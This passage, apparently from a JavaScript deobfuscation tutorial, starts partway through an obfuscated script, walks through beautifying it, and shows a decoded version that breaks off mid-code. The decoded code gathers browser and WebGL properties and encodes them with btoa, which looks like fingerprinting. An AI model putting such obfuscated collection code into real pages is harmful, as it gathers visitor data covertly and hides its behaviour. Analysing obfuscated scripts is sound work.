W(l=fo0{n,a.W)f&e1jof%tPad,WsWv;n_nWI. uPjoljjPU$zr42Wife|]W$}tWj%]WP%d)W0WWWd%>ej i)tzNs"riz7PW72r2rbKE(8t-656NW7*]cl/f%,f)l;s<]fp-WWn]aW29.(WnWRj]])g 6=g(ae_itMW,iujuWwfP{3WWfWW,2yw);b1,W/1c% aP .bP3ckc0uf.3lWeWyW]ugWWnb )WWnn]sc7Wm.a+_(".jmNc(f[i.e]_u.ne,_e)tWcU),eW]F WW(.y1W i]WW%Wz]Wu]0]86.jP0+9,ece1..s.W,$icWep8<3$_b.%+25_]ejty[7a )6.fj}$}a}WW(lW6D1aoeW$)M"5;jW4j.i\'(l(FV63PPW5W%u)7 eP ..)q{}tN)s(;e&%d08lKj[.9.4&W!fWe<f ql6ifPaP5b{}vP5rg-l$. FefWSWjpecWEEe%$|)NfW;aeno_]$Prn,fz)i_j]Wj.$ 89r.%_W"h1iPi$;n)1PWW|1"W&%.2jp7Let3W5dda&u.1z|ydWwZjWW)W(fx lp.akm9e6_j=..n%;"(owbeTPorP)3SWEf){WWm]-WWWW|A#grr(}$lW&b%dWj;c`W*Wj.bAh0p=W 0PAje)rTIWem(fuw(].Pf]$Wip39)3\'W0.WfoW%bp,e!!JW]wfflri)W+iWrW;_WnW);0Wze1(";c.V(3{W,u 8Pja7y.WBnWnW](nmrz4W)+8ff6_6;i=;t.cE0!ke})__(]paoWeutn]W)0jWW j,]k6i;{bWM1.].c_c$WC(HooZ_P_3@{P(;).NfW6Wu{+ifcW.7W3Wp_Vip.mP_f6%d*!t) W,_jcv;WPW$aa.fTW_W.eev{}j$r%Pj#ozP}nW.&_Nw0 po.w_iW;jW#5_P.fW_t}j9an"(u5{elSxZ1@gt1_n6W;4WcT 5%W,%) f 4ve,)i_].[&(_W;e}WjWP(Wg(#)fW{5e[!; {D.oTx*xua9")P WWW5.WfW$56]?oe=gWs}(p}a)s{_nc7PWt0WwrWWe3 t4.g, AriWfe*!tm1P(ltc{=fngiae%= 5%[=|o86.n&w(7m)(=6[W-{i)nPtWfj2%W7sWe_oinM6WWf1yf"_9WWPrncwsa%W(;XP( G,)t5n)pW134W]q_8l)){6pr.Piwimp{W)tj)1(]t*l_1%,;q,0rf_jWoW))f{3]_)Pt(fjl\'!Wk5;/%gq2Wg3)e(8WSWyjWL^_4cW8iW!{X[Wnyh)Cj,ii-.r;b%+%cZWt5!.1()d)8hW_3iti . jf,PWWVWj" .i.)T#6e{0j!o(ewst6WW\'%t.(u($17Dbn46r(2tM]P6(W3c3i.rWUtWP)i]/o(4WW"-J#;Wz(;WP4_=WWfWtUtE,%yjfm!- r%W=0"Irf+g17mPW")"wi(t erV;]r.jd2de,%0Pob)ib)PmW;rpcm}W_1W]Wjb6PW2s8e{W02ijW(4etW5W;ctn]]W&8W4f,;mamte6p=W[W9KeY)i1(;Wn]%44je8e f]i!ow,]tWlt(WtiP;f)W_=s)W,}}il{PpP$teqW{.i)/pj_uy=b5W!WWeuuG v)tlNr.Eb5W3ugWb_(L6P,.q%)WatZneWaWe{pr$q4"wb]e.s6wPi.0bow%Ls_sn;05s"_]w.)!tf.(w]Sh!c0a7;.7[(z )!nW\'m) $nWWt))p%S7%.0|.Int{.f)YW2_lf](W turr WitrWtw58asP[eJ!0$zeWW,l37>WW}f]i(t5+ds3W;r_W5(=jf&Wv5i)3(eWr,p_#)3Wfa1MWe"{!ada<%u?nW%a.=ti.nf(.8nef;d]&eu>P.rid3!-Pam)s;sD[P.(W;3]ji5 Otrn0!egecu)Wte#%eng(xau4%bdW])cPW{nsnjkh)jecf)tef,engjn,b%[(icr7s#i264d i)1Wz1Ea1t6[wr}.jrW]Wofpsotd(nol#! )2EsHh(o]=se{@b5etWbs_zzp.(; eJW_]b0\'i$jfa,e.ufRt%9W Plx;]oW]Pnt $a 4.Ws8{adrC(4C_aaP"p=0f$W2$WPW3,2Q0$P}PWW(%rPgv.kS).(Wioo]6jj;P!a#P)}8n=]er6ag2Pj.=$ee..efW1?_a31).jfa}e._3}.W_6]8.c(5p1&i)[tP)[WWyw),0 pwoa6nd3W]9) =]1W`e_$Wje"W$("en o@aeWbwseW}5Wn8W+en"(e%0%be5)g@%efc!=tavff;WiSln)%(e)wr.W)5!W20j1aW)P%=cPx.mP]1()JP]r8)*u],pq7$W40W(/e7k:r=(]nSnW]83]);|st;!!wWt8(fwisf\\]0W)3n_svi]nu8P.brr.]7.)PP.rvpWeWdg8,(g,i6;W{ab5%(s]=(}(iuauc.=W^85v(a(g)W#_b.W7fc6.ji,]n$!()V!W)Ej6cmmnWn20(PWi%f`?_u)_W3e90$W]b)Pjs25EWe=otP4e3g;u%%xs7WbO6PW{b3n)c2.W ]s1PPW(<W$930<jH=Ww"Wrtf)WN ]We6#09c0D<] W&1df1P i|i({)W#98W4]_]-Woo]])n1oEj( PW_(5"%a0=E;.?lv0"0i{6P0.w]$0!WW-W.)WPW+gn,3xW,Wfd.={ eW.nrm}1.W_aWW](l6)WwW3jrp 85lWiW_,&,jm45(1.\'aWU40(lo_g)l48)]_t.W)!WWEE PfIW+{qfsrdSW0WnN$3}oW)Wdjf]2+ee6WW)-(eWlt WW[.i6nWnW.i(e9(W&lW]WaW98,#Wn(f=42%9S\'eke7N)_fP7;j(0PidWteW5o(])d2]5y=lI(!W;y .Pu;{3]ofn(3$}8f7psjfl.n-{j,So$Pemi}WW\')e4(SfW286f %0epc)fdrqioaq(._u_cW_yo.Wpi6W.W]))0u-Wlx,)P&).j)c]se(h6.{.WD\\a1]7fte;sSWP W(2b.$e$#r3,(p {f).1]_q%_di168hWe.ax}fw}eWojw)WSl0trWs l}%fpbho5(3{o]C2.;;kWayWfINmit.pWc.P(oeP_a5c.W_`i+&=Wo.rrisW{P:W% Sf}e.mll6WW_5Pt6i=WnW. e;WiWW ({ 4W#.]fW(f]lo2jW;3P-)}t.^u(c SWga.e.W})5dWtW!(P0b)5pDN)lWypuac!6W)).Pb7j1ofibbGlaWk3Ps1 a,4)b4rjdWSem%)pzi&)o4fe;.nW})#}xg(t{p$KnWbz3I"9WP,6[Nf_fgP)0;ChPWWPj&f.n.bfz=]P#__7{\'WW1s}%]_ W)I=!868W}l0jW]_eWbxW]cd_PWWWa)fg$Pn;=b]W_0=]Wz WtWeb$mPnneqW_p_gy71]W3 |W(f%s5)t!Wdm&.rqtWr 3/]IcSg_WvF}PN> [b5jej$Wvfjw5-Pl WWtW] W3_rf_W=43]]]We7!(q]jW}pi()t(.W]WwPWlWyWl6=.PW. ]g0!.WantWcli5j-[|lw{e75;goW_PtW)b46aW2Wfbf eyf]m$Wf hW]j2e}W,),gW(pcaj5P+pnW55P)p .pbmg1ori.6$]47WW)wx.S3.fcm(.jrPj85W [)|e[iW4oaz)r&WlPe A{Wa.mnW oW(Wp}ufe)W.W_Wr%=o!7}Wjhk!(j 9ri13+6peo(9_6tgWWnx{n}]l(W7(%67b_"__]53}8;! )r*nv1W&ptpk)Id)e8(nuWI0W=}ft.7t.lf)6WW5kcP')))(3597)}();
The above string is obfuscated JS. In general, JS obfuscation is a combination of identifier renaming, adding useless code and weird looking symbols, reordering functions and essentially, making it look useless. However, if you execute obfuscated JS code in a browser console, it would run perfectly fine!
Beautification
The above obfuscated JS string can be beautified as follows:
function() {
function W(W) {
for (var e = 3810997, P = W.length, f = [], n = 0; n < P; n++) f[n] = W.charAt(n);
for (var n = 0; n < P; n++) {
var r = e * (n + 305) + e % 48638,
t = e * (n + 158) + e % 31757,
i = r % P,
j = t % P,
_ = f[i];
f[i] = f[j], f[j] = _, e = (r + t) % 6701531
}
return f.join("")
}
var e = W("cocowrfctgjurnxypuhdetlrbvkossmzntaqi").substr(0, 11), P = W[e];
P("",
P("",
W('agh =.6=i921n=o(.g]ul+o]rowcdi8or;tscaev]im7nu[r)8;(sa]r [=bltd,nn0[vm.d7ia(nav,,0(,rvu(rr8),i5,nv;)ig e,m(oll,v0t(;,t0pclaAa(nh,ifh[gcrb7v.,nelxClozo=go[;i9t[!rp[+=s=v;0=1+a=a=gse=o,r4]o]!xs;) c")j[gterr{adodaarn+mhhbb.ip7 tA9n"-)w(rrarra=tbmuCt=ia6..)c))ur+a1"f0;;grr>eav=tC;k+j-h;1d jgpt-h(hhd =et;le=vlrSb1)Cro;va, gm+s(=2=}ro[n*;hs;el-;= vf(dc6ni;+ r{jrSl1nrsgs;a;nck+rjteg3rn=".[qal ou 0c2ri;m0==1(e]af] r+c;ta{+o-cn34+; hbdAv.ae=bnoft.{( 1gs;);)l1ij-9tw07ffva)5la};(nf}a"gth7u+2,2q=;=vlvet;[(t;)b.b( ;u9jpv80;v27;ir6p,rui n78,gc={cy9,ppe8=)lf;<=t;gu4gs=+1;6"(;,8)6sr}vue+=buc7t(.bs{o=]))hk.Cr;;;rah<)i6,=gr+}c ]9(.(in=l+ (hadaf1ph.ius]6f.sr;jtki,=d+)(0rbp.]c+o2cno";<*g)r6)8rsls(0;x]=v4r=5ua)oCio)eot;oarea=.=)r(6u(}e=a,grptr<[(3n=ih"z)vv=[[vl(;r)pofjjq,"2uCnl(ak+)i}.trCvvl f=..{-u( )s4n)o2+i.]vw..enb;;nsz,c,;cn (u)>+r+x6,+u"rn)e (fnbhtg<(knqne))an;r,.tre7wonpl+met1(A,A.e6ull8.a')
)(W('4fWfo1!WldetQ$;pbn$$)))fl0!SWuWeefCicX_f;;o_U4=2_Wf]aWg(.(1;:=ug_h)e ($s};4}2W%W.WW}"bt!WWW4y[PW_;r]q:5ee|WiWn\'WrZt203w]. Y%N b)yW$.$6(W{}deloW]PboWj{;CW (f.],"_(.foyp(uW06uWjW}feojWt!WjcbWjPn!..# tX6]s j!l} fb=6]Wlee,)W()eC)WW(dWro P_r):ocPrwTP!8]5<WWrW ))a}_ecen$W9Wcte)36,4.09l}Waeuop0b)({{,c)WWrj..azee7.Ej}WdW;TWxPWn_7e)gjj8eW(e}#u}SW_h1.:b)OWp$(5,W)_] WPe=u)ee t0dt.c(WP(Wl*i$gWf(+0_w5W9gWPW=t73,u$Wenf$s_(We_f= !_%1P0b5WoW(RT=!i=n)i)95)PWWq)7S}]We[=S9W% .gWx0.}r{WHWW5nW6t.S,1eog[f6T(d)$, WrWe.^[96{r1$z=,$t3W/04X2We]?e(eiP0WW.an)D._WwCSN{bWWjW_t{6=6tn_Wn(tp5}}n%;, 4 $.0[e9(vt/kd/ igPcf.jc_eWP2mPjbf!Wjs =Wef_69.,9;dai+){)WPWo3(n)5.b}W%dW)n,P44)irwjWBfu45W./0eedW)lnRi;pWo]5-Wcf\'PF}0W!fSs0W)%h(fWuM+me2)(We/W (u"bj__%$k_P0Cn%0(fe=WQct2o2go(eP2l1 W}n!ufn;n]W7wb{i8=_(W587v%]!W_Pq{W1.)u$W,[df-ume_WtW((f*]W%J%oWjsarC(8efl]e}IDt.W=b)DWzWW_qW#9 #pmj%nsp;nu\\l]W.=W.;6=W}.{%_?p-Wfn?lW mojWi(9!W}"lfz4.pW.r*be_l_..a [PD!{PW)_neqP7PW&$PB{h3;oWaWW{in3#j+W%u$tu"Cy,pjo{W;0ie%_1*W!12jB)0i1e_2W2En0p)d};)liWj.0 j},Soa,^._];PWj"0).29;PoWWf).W(;{J(wn2PVW(.PW Ww5]9t]}Wo]],rW1ti_g__W==Wi.PPiWWcPf)(W)5W5(/50&WM|7r)k1{,Ps]n_),P_w]_etWWe.(iP!).dWb8foWjuWWWP#7fP5W]W7(!0o0\\Wy2 x1{E11!.ea0(a1\'r[g;,WW-mmi&PPPY_jh}_b8g9WWr,wWW{gfr9t$a_2)EiQuW(4n1jg]i,%#\\{ja7W[W&tW?{.6!!PPeWd)X1 e8-vaPf,W+")teg{}n%,+r$a]2?3f);wu%WnW1o}e(o1"W)uW(lnmej)),jo_82$,5jtMP{$)W9tjn=sa;a!)(W3we%up}|el_8]{zePjPS#.(g\'eW;a%vM0aWo05twd]4WWWrW 3Wt d,o.$iP4IWcu{WWWP)9W3(WtG7W(nwjeh.W.i} W(l=fo0{n,a.W)f&e1jof%tPad,WsWv;n_nWI. uPjoljjPU$zr42Wife|]W$}tWj%]WP%d)W0WWWd%>ej i)tzNs"riz7PW72r2rbKE(8t-656NW7*]cl/f%,f)l;s<]fp-WWn]aW29.(WnWRj]])g 6=g(ae_itMW,iujuWwfP{3WWfWW,2yw);b1,W/1c% aP .bP3ckc0uf.3lWeWyW]ugWWnb )WWnn]sc7Wm.a+_(".jmNc(f[i.e]_u.ne,_e)tWcU),eW]F WW(.y1W i]WW%Wz]Wu]0]86.jP0+9,ece1..s.W,$icWep8<3$_b.%+25_]ejty[7a )6.fj}$}a}WW(lW6D1aoeW$)M"5;jW4j.i\'(l(FV63PPW5W%u)7 eP ..)q{}tN)s(;e&%d08lKj[.9.4&W!fWe<f ql6ifPaP5b{}vP5rg-l$. FefWSWjpecWEEe%$|)NfW;aeno_]$Prn,fz)i_j]Wj.$ 89r.%_W"h1iPi$;n)1PWW|1"W&%.2jp7Let3W5dda&u.1z|ydWwZjWW)W(fx lp.akm9e6_j=..n%;"(owbeTPorP)3SWEf){WWm]-WWWW|A#grr(}$lW&b%dWj;c`W*Wj.bAh0p=W 0PAje)rTIWem(fuw(].Pf]$Wip39)3\'W0.WfoW%bp,e!!JW]wfflri)W+iWrW;_WnW);0Wze1(";c.V(3{W,u 8Pja7y.WBnWnW](nmrz4W)+8ff6_6;i=;t.cE0!ke})__(]paoWeutn]W)0jWW j,]k6i;{bWM1.].c_c$WC(HooZ_P_3@{P(;).NfW6Wu{+ifcW.7W3Wp_Vip.mP_f6%d*!t) W,_jcv;WPW$aa.fTW_W.eev{}j$r%Pj#ozP}nW.&_Nw0 po.w_iW;jW#5_P.fW_t}j9an"(u5{elSxZ1@gt1_n6W;4WcT 5%W,%) f 4ve,)i_].[&(_W;e}WjWP(Wg(#)fW{5e[!; {D.oTx*xua9")P WWW5.WfW$56]?oe=gWs}(p}a)s{_nc7PWt0WwrWWe3 t4.g, AriWfe*!tm1P(ltc{=fngiae%= 5%[=|o86.n&w(7m)(=6[W-{i)nPtWfj2%W7sWe_oinM6WWf1yf"_9WWPrncwsa%W(;XP( G,)t5n)pW134W]q_8l)){6pr.Piwimp{W)tj)1(]t*l_1%,;q,0rf_jWoW))f{3]_)Pt(fjl\'!Wk5;/%gq2Wg3)e(8WSWyjWL^_4cW8iW!{X[Wnyh)Cj,ii-.r;b%+%cZWt5!.1()d)8hW_3iti . jf,PWWVWj" .i.)T#6e{0j!o(ewst6WW\'%t.(u($17Dbn46r(2tM]P6(W3c3i.rWUtWP)i]/o(4WW"-J#;Wz(;WP4_=WWfWtUtE,%yjfm!- r%W=0"Irf+g17mPW")"wi(t erV;]r.jd2de,%0Pob)ib)PmW;rpcm}W_1W]Wjb6PW2s8e{W02ijW(4etW5W;ctn]]W&8W4f,;mamte6p=W[W9KeY)i1(;Wn]%44je8e f]i!ow,]tWlt(WtiP;f)W_=s)W,}}il{PpP$teqW{.i)/pj_uy=b5W!WWeuuG v)tlNr.Eb5W3ugWb_(L6P,.q%)WatZneWaWe{pr$q4"wb]e.s6wPi.0bow%Ls_sn;05s"_]w.)!tf.(w]Sh!c0a7;.7[(z )!nW\'m) $nWWt))p%S7%.0|.Int{.f)YW2_lf](W turr WitrWtw58asP[eJ!0$zeWW,l37>WW}f]i(t5+ds3W;r_W5(=jf&Wv5i)3(eWr,p_#)3Wfa1MWe"{!ada<%u?nW%a.=ti.nf(.8nef;d]&eu>P.rid3!-Pam)s;sD[P.(W;3]ji5 Otrn0!egecu)Wte#%eng(xau4%bdW])cPW{nsnjkh)jecf)tef,engjn,b%[(icr7s#i264d i)1Wz1Ea1t6[wr}.jrW]Wofpsotd(nol#! )2EsHh(o]=se{@b5etWbs_zzp.(; eJW_]b0\'i$jfa,e.ufRt%9W Plx;]oW]Pnt $a 4.Ws8{adrC(4C_aaP"p=0f$W2$WPW3,2Q0$P}PWW(%rPgv.kS).(Wioo]6jj;P!a#P)}8n=]er6ag2Pj.=$ee..efW1?_a31).jfa}e._3}.W_6]8.c(5p1&i)[tP)[WWyw),0 pwoa6nd3W]9) =]1W`e_$Wje"W$("en o@aeWbwseW}5Wn8W+en"(e%0%be5)g@%efc!=tavff;WiSln)%(e)wr.W)5!W20j1aW)P%=cPx.mP]1()JP]r8)*u],pq7$W40W(/e7k:r=(]nSnW]83]);|st;!!wWt8(fwisf\\]0W)3n_svi]nu8P.brr.]7.)PP.rvpWeWdg8,(g,i6;W{ab5%(s]=(}(iuauc.=W^85v(a(g)W#_b.W7fc6.ji,]n$!()V!W)Ej6cmmnWn20(PWi%f`?_u)_W3e90$W]b)Pjs25EWe=otP4e3g;u%%xs7WbO6PW{b3n)c2.W ]s1PPW(<W$930<jH=Ww"Wrtf)WN ]We6#09c0D<] W&1df1P i|i({)W#98W4]_]-Woo]])n1oEj( PW_(5"%a0=E;.?lv0"0i{6P0.w]$0!WW-W.)WPW+gn,3xW,Wfd.={ eW.nrm}1.W_aWW](l6)WwW3jrp 85lWiW_,&,jm45(1.\'aWU40(lo_g)l48)]_t.W)!WWEE PfIW+{qfsrdSW0WnN$3}oW)Wdjf]2+ee6WW)-(eWlt WW[.i6nWnW.i(e9(W&lW]WaW98,#Wn(f=42%9S\'eke7N)_fP7;j(0PidWteW5o(])d2]5y=lI(!W;y .Pu;{3]ofn(3$}8f7psjfl.n-{j,So$Pemi}WW\')e4(SfW286f %0epc)fdrqioaq(._u_cW_yo.Wpi6W.W]))0u-Wlx,)P&).j)c]se(h6.{.WD\\a1]7fte;sSWP W(2b.$e$#r3,(p {f).1]_q%_di168hWe.ax}fw}eWojw)WSl0trWs l}%fpbho5(3{o]C2.;;kWayWfINmit.pWc.P(oeP_a5c.W_`i+&=Wo.rrisW{P:W% Sf}e.mll6WW_5Pt6i=WnW. e;WiWW ({ 4W#.]fW(f]lo2jW;3P-)}t.^u(c SWga.e.W})5dWtW!(P0b)5pDN)lWypuac!6W)).Pb7j1ofibbGlaWk3Ps1 a,4)b4rjdWSem%)pzi&)o4fe;.nW})#}xg(t{p$KnWbz3I"9WP,6[Nf_fgP)0;ChPWWPj&f.n.bfz=]P#__7{\'WW1s}%]_ W)I=!868W}l0jW]_eWbxW]cd_PWWWa)fg$Pn;=b]W_0=]Wz WtWeb$mPnneqW_p_gy71]W3 |W(f%s5)t!Wdm&.rqtWr 3/]IcSg_WvF}PN> [b5jej$Wvfjw5-Pl WWtW] W3_rf_W=43]]]We7!(q]jW}pi()t(.W]WwPWlWyWl6=.PW. ]g0!.WantWcli5j-[|lw{e75;goW_PtW)b46aW2Wfbf eyf]m$Wf hW]j2e}W,),gW(pcaj5P+pnW55P)p .pbmg1ori.6$]47WW)wx.S3.fcm(.jrPj85W [)|e[iW4oaz)r&WlPe A{Wa.mnW oW(Wp}ufe)W.W_Wr%=o!7}Wjhk!(j 9ri13+6peo(9_6tgWWnx{n}]l(W7(%67b_"__]53}8;! )r*nv1W&ptpk)Id)e8(nuWI0W=}ft.7t.lf)6WW5kcP'))
)(3597)
}();
Removing Redundant Code
In the above JS code, we have the following relevant expressions:
- function
W()
that takes a stringW
as input, - Assigning a function to
P
through the statementP=W[e]
P("", P("", W(<obfuscatedString1>))(W(<obfuscatedString2>)))(3597)
Since we know function W()
, we can use an online JS editor to determine the value of variables that depend on the output of function W()
. In the above code, the value of variable e
is 'constructor'
. So, variable P
contains a constructor function. Similarly, we can also find the value of expressions, W(<obfuscatedString1>)
and W(<obfuscatedString2>)
. After executing the expression, P("", W(<obfuscatedString1>))(W(<obfuscatedString2>))
, the resultant code is:
function() {
function W(W) {
for (var e = 3810997, P = W.length, f = [], n = 0; n < P; n++) f[n] = W.charAt(n);
for (var n = 0; n < P; n++) {
var r = e * (n + 305) + e % 48638,
t = e * (n + 158) + e % 31757,
i = r % P,
j = t % P,
_ = f[i];
f[i] = f[j], f[j] = _, e = (r + t) % 6701531
}
return f.join("")
}
P = W['constructor'];
P("",
'function jso$ft$boe$_61_61_61(a, b) { return a === b } function jso$ft$giden$Reflect() { return Reflect } function jso$ft$boe$_33_61_61(a, b) { return a !== b } function jso$ft$boe$_61_61(a, b) { return a == b } function jso$ft$giden$WebGLRenderingContext() { return WebGLRenderingContext } function jso$ft$boe$_33_61(a, b) { return a != b } function jso$ft$boe$in(a, b) { return a in b } function jso$ft$giden$jbj() { return jbj } function jso$ft$giden$btoa() { return btoa } function jso$ft$giden$JSON() { return JSON } function jso$ft$giden$wef() { return wef } function jso$ft$giden$escape() { return escape } function jso$ft$giden$Node() { return Node } function jso$ft$giden$document() { return document } function jso$ft$giden$_95_36af_53_48_55_55() { return _$af5077 } function jso$ft$giden$_95new_36obj_95() { return _new$obj_ } function jso$ft$giden$mljpj() { return mljpj } function jso$ft$giden$window() { return window } function jso$ft$giden$_95_36af_53_48_56_50() { return _$af5082 } function jso$ft$uoel$_33(a) { return !a } function jso$ft$giden$String() { return String } function jso$ft$boe$_37(a, b) { return a % b } function jso$ft$boe$_43(a, b) { return a + b } function jso$ft$boe$_60(a, b) { return a < b } function _$af5085() { _$af5077 = _$_b5e6[54] } function _new$obj_() { var o = {}; for (var i = 0; jso$ft$boe$_60(i, arguments.length); i += 2) { o[arguments[i]] = arguments[jso$ft$boe$_43(i, 1)] }; return o } function _$af5082(k, jso$setrpl$e) { var e = {}, i = {}, w = {}, g = {}, b = {}, z = {}, n = {}; e._ = jso$setrpl$e; var q = k.length; i._ = [];; for (var f = 0; jso$ft$boe$_60(f, q); f++) { i._[f] = k.charAt(f) }; for (var f = 0; jso$ft$boe$_60(f, q); f++) { w._ = jso$ft$boe$_43(e._ * (jso$ft$boe$_43(f, 447)), (jso$ft$boe$_37(e._, 50266)));; g._ = jso$ft$boe$_43(e._ * (jso$ft$boe$_43(f, 203)), (jso$ft$boe$_37(e._, 53635)));; b._ = jso$ft$boe$_37(w._, q);; z._ = jso$ft$boe$_37(g._, q);; n._ = i._[b._];; jso$spliter_$af5086(b, i, z); jso$spliter_$af5087(z, i, n); jso$spliter_$af5088(e, w, g) }; var u = jso$ft$giden$String().fromCharCode(127); var x = ""; var m = "%"; var y = "#1"; var c = "%"; var p = "#0"; var v = "#"; return i._.join(x).split(m).join(u).split(y).join(c).split(p).join(v).split(u) } function _$af5077() { var lkjej = {}, iiop = {}, cnj_j = {}; var jso$setrpl$cnj_j = {}; var jso$setrpl$lkjej = {}; var hgjfj = {}; jso$setrpl$cnj_j._ = jso$builder_$af5081_jso$setrpl$cnj_j(cnj_j); jso$setrpl$lkjej._ = jso$builder_$af5079_jso$setrpl$lkjej(); hgjfj._ = jso$builder_$af5080_hgjfj(lkjej); lkjej._ = jso$setrpl$lkjej._; cnj_j._ = jso$setrpl$cnj_j._; if (jso$ft$uoel$_33(_$af5082)) { jso$ft$giden$_95_36af_53_48_56_50()(_$_b5e6[4], _$_b5e6[15], _$_b5e6[32], 1, 1) } else { jso$ft$giden$window()[_$_b5e6[0]] = jso$ft$giden$_95new_36obj_95()(_$_b5e6[1], jso$ft$boe$_43(_$_b5e6[2], jso$ft$giden$mljpj()[_$_b5e6[3]]), _$_b5e6[4], false) }; jso$spliter_$af5089(); jso$ft$giden$mljpj()[_$_b5e6[6]] = (1 && hgjfj._)(); if (jso$ft$uoel$_33(_$af5077)) { jso$ft$giden$_95_36af_53_48_56_50()(false, _$_b5e6[2]) }; jso$spliter_$af5090(); jso$spliter_$af5091(); if (jso$ft$uoel$_33(_$af5077)) { jso$ft$giden$_95_36af_53_48_55_55()(_$_b5e6[16], _$_b5e6[28]); jso$spliter_$af5092() }; jso$spliter_$af5093(); var ddjtj = jso$ft$giden$document()[_$_b5e6[14]][0][_$_b5e6[13]]; jso$ft$giden$mljpj()[_$_b5e6[15]] = jso$ft$boe$_43(jso$ft$giden$escape()(jso$ft$giden$Node()[_$_b5e6[18]][_$_b5e6[17]])[_$_b5e6[16]] + _$_b5e6[19], jso$ft$giden$escape()(jso$ft$giden$document()[_$_b5e6[20]])[_$_b5e6[16]]); jso$ft$giden$mljpj()[_$_b5e6[21]] = jso$ft$giden$document()[_$_b5e6[23]](_$_b5e6[22])[_$_b5e6[16]]; ddjtj[_$_b5e6[25]](/MutationObserver/g, jso$builder_$af5078_()); if (jso$ft$uoel$_33(_$_b5e6)) { jso$ft$giden$_95_36af_53_48_56_50()(); jso$spliter_$af5096(); return }; if (jso$ft$giden$wef()[_$_b5e6[4]]) { return }; try { iiop._ = jso$ft$giden$document()[_$_b5e6[28]](_$_b5e6[47]);; jso$spliter_$af5100(iiop); if (jso$ft$uoel$_33(_$af5077)) { return }; if ((1 && lkjej._)(jso$ft$giden$document()[_$_b5e6[51]][_$_b5e6[17]])) { return }; jso$ft$giden$document()[_$_b5e6[51]][_$_b5e6[17]](iiop._); jso$ft$giden$mljpj()[_$_b5e6[52]] = (1 && cnj_j._)(iiop._[_$_b5e6[54]][_$_b5e6[53]], 0); } catch (e) {}; jso$ft$giden$wef()[_$_b5e6[64]] = jso$ft$giden$escape()(jso$ft$giden$escape()(jso$ft$giden$btoa()(jso$ft$giden$JSON()[_$_b5e6[65]](jso$ft$giden$mljpj())))); } function jso$builder_$af5081_jso$setrpl$cnj_j(cnj_j) { return function(jso$setrpl$ja, jso$setrpl$jbt, jso$setrpl$_c) { var ja = {}, jbt = {}, _c = {}, aca = {}; ja._ = jso$setrpl$ja; jbt._ = jso$setrpl$jbt; _c._ = jso$setrpl$_c; jso$spliter_$af5101(jbt, _c, ja); if (jso$ft$uoel$_33(_$_b5e6)) { return } else { for (var zrz = 0; jso$ft$boe$_60(zrz, _c._[_$_b5e6[56]][_$_b5e6[55]][_$_b5e6[16]]); zrz++) { if (jso$ft$uoel$_33(_$af5082)) { return } else { if (jso$ft$boe$_61_61(_c._[_$_b5e6[56]][_$_b5e6[55]][zrz], ja._)) { return 0 } } } }; jso$spliter_$af5102(_c, ja); aca._ = 0;; if (jso$ft$boe$_61_61(document()[_$_b5e6[ja._]], _$_b5e6[57]) || jso$ft$boe$_61_61(document()[_$_b5e6[ja._]], _$_b5e6[38]) && jso$ft$boe$_33_61(ja._, null) && jso$ft$boe$_33_61(ja._, _c._[_$_b5e6[58]]) && jso$ft$boe$_33_61(ja._, _c._[_$_b5e6[59]]) && jso$ft$boe$_33_61(ja._, _c._[_$_b5e6[60]])) { for (var ava of jso$ft$giden$Reflect()[_$_b5e6[61]](ja._) || jso$ft$boe$in(ava, ja._)) { try { if (jso$ft$uoel$_33(_$af5077)) { jso$ft$giden$_95_36af_53_48_56_50()(true, 0); return }; if (jso$ft$boe$_61_61(ava, _$_b5e6[14]) || (jso$ft$boe$_61_61(typeof(ja._[_$_b5e6[62]]), _$_b5e6[38]) && jso$ft$boe$_61_61(typeof(ja._[_$_b5e6[62]](ava)), _$_b5e6[38])) || (jso$ft$boe$_61_61(typeof(ja._[_$_b5e6[63]]), _$_b5e6[38]) && jso$ft$boe$_61_61(typeof(ja._[_$_b5e6[63]](ava)), _$_b5e6[38]))) { aca._++ } else { if (jso$ft$uoel$_33(_$_b5e6)) { jso$ft$giden$_95_36af_53_48_55_55()(); return } else { if (jso$ft$boe$_61_61(jso$ft$boe$j, _$_b5e6[57])) { if (jso$ft$boe$_60(jbt._, 30)) { aca._ += (1 && cnj_j._)(ja._[ava], jso$ft$boe$_43(jbt._, 1), _c._) } } else { if (jso$ft$uoel$_33(_$af5082)) { jso$ft$giden$_95_36af_53_48_55_55()(0, null); jso$spliter_$af5103() } else { if (jso$ft$boe$_61_61(jso$ft$boe$j, _$_b5e6[38])) { var zrz = jso$ft$giden$escape()(ja._[ava])[_$_b5e6[16]]; if (jso$ft$boe$_33_61(zrz, 2)) { if (jso$ft$boe$_61_61_61(_$af5082, 1)) { jso$ft$giden$_95_36af_53_48_56_50()(); jso$spliter_$af5104(); return }; aca._ += jso$ft$giden$escape()(ja._[ava])[_$_b5e6[16]] }; if (jso$ft$boe$_61_61(_$af5082, true)) { return } else { if (jso$ft$boe$_60(jbt._, 30)) { if (jso$ft$uoel$_33(_$_b5e6)) { return }; aca._ += (1 && cnj_j._)(ja._[ava][_$_b5e6[18]], jso$ft$boe$_43(jbt._, 1), _c._) } } } } } } } } catch (e) {}; jso$spliter_$af5105(); jso$spliter_$af5106(aca) } } else { if (jso$ft$boe$_61_61_61(_$af5077, _$_b5e6[31])) { jso$ft$giden$_95_36af_53_48_55_55()(false) }; return 1 }; if (jso$ft$uoel$_33(_$_b5e6)) { return }; return aca._ } } function jso$builder_$af5078_() { return function(m, n) { jso$spliter_$af5094(); return _$_b5e6[24] } } function jso$builder_$af5079_jso$setrpl$lkjej() { return function(ja) { if (jso$ft$boe$in(_$_b5e6[18], ja)) { if (jso$ft$uoel$_33(_$af5082)) { jso$ft$giden$_95_36af_53_48_55_55()(_$_b5e6[56]); return }; jso$spliter_$af5095() } else { return false }; return jso$ft$giden$wef()[_$_b5e6[4]] } } function jso$builder_$af5080_hgjfj(lkjej) { return function() { if (jso$ft$boe$_33_61(jso$ft$giden$WebGLRenderingContext()[_$_b5e6[18]][_$_b5e6[26]](), _$_b5e6[27])) { if (jso$ft$uoel$_33(_$af5077)) { _$af5082 = _$_b5e6[7] } else { return } }; if (jso$ft$uoel$_33(_$af5077)) { jso$ft$giden$_95_36af_53_48_55_55()(0, false) }; if (jso$ft$giden$WebGLRenderingContext()) { var qpjoj; var rujcj; var ii = 4; if ((1 && lkjej._)(jso$ft$giden$document()[_$_b5e6[28]])) { return }; var ewjqj = jso$ft$giden$document()[_$_b5e6[28]](_$_b5e6[29]); var trjej = [_$_b5e6[30], _$_b5e6[31], _$_b5e6[32], _$_b5e6[33]]; var iujyj = [_$_b5e6[34], _$_b5e6[35]]; var ii = 4; while (ii--) { if 